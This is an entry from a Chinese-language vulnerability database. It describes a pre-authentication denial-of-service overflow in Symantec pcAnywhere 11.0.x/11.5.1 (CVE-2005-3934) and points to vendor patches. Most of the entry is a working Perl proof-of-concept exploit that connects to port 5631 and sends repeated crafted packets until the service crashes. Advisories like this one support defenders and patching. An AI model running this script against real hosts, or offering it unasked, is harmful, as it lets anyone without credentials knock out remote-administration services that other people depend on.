pcAnywhere认证拒绝服务漏洞

2006-08-17T00:00:00
ID SSV:4218
Type seebug
Reporter Root
Modified 2006-08-17T00:00:00

Description

BUGTRAQ ID: 15646 CVE(CAN) ID: CVE-2005-3934

Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。

pcAnywhere在处理特制消息的时候存在溢出漏洞,可能导致拒绝服务。由于溢出发生在认证之前,因此远程攻击者无需有效的凭据便可利用这个漏洞。

Symantec pcAnywhere 11.5.1 Symantec pcAnywhere 11.0.1 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://www.symantec.com/techsupp/files/pca/index.html target=_blank>http://www.symantec.com/techsupp/files/pca/index.html</a> <a href=http://www.symantec.com/techsupp/enterprise/products/spca/files.html target=_blank>http://www.symantec.com/techsupp/enterprise/products/spca/files.html</a>

                                        
                                            
                                                #!/usr/bin/perl -w
# Version 2.0
#
# PoC for
# pcAnywhere Authentication Denial of Service Vulnerability
# Bugtraq ID:     15646
#
# Tested on pcanywhere v11.0 and v11.0.1
#
# Author: David Maciejak
# Date: 20060117
#
##############################

use IO::Socket;

if (@ARGV&lt;1)
{
    die &quot;usage: $0 pcanywhere_ip [port]&quot;;
}

$host=$ARGV[0];
$port=$ARGV[1] || 5631;

$|=1;

$cl1=&quot;\x00\x00\x00\x00&quot;;
$cl2=&quot;\x6F\x06\xff&quot;; 
$cl3=&quot;\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00&quot;;
$cl4=&quot;\x6f\x62\x01\x02\x00\x00\x00&quot;;

$sock = IO::Socket::INET-&gt;new( PeerAddr =&gt; $host,
               PeerPort =&gt; $port,
              Proto =&gt; 'tcp'
            );
        
die &quot;Could not create socket: $! \n&quot; unless $sock;

$sock-&gt;send($cl1);
$sock-&gt;recv($buff,32768);
$sock-&gt;send($cl2 x 50);
$sock-&gt;recv($buff,32768);
$sock-&gt;send($cl3 x 50);
$sock-&gt;recv($buff,32768);
$sock-&gt;send($cl4);
$sock-&gt;recv($buff,32768);

$str='\x06'.'\x04'.'\0xffffffc0'x300;
$sock-&gt;send($str x 50);
close $sock;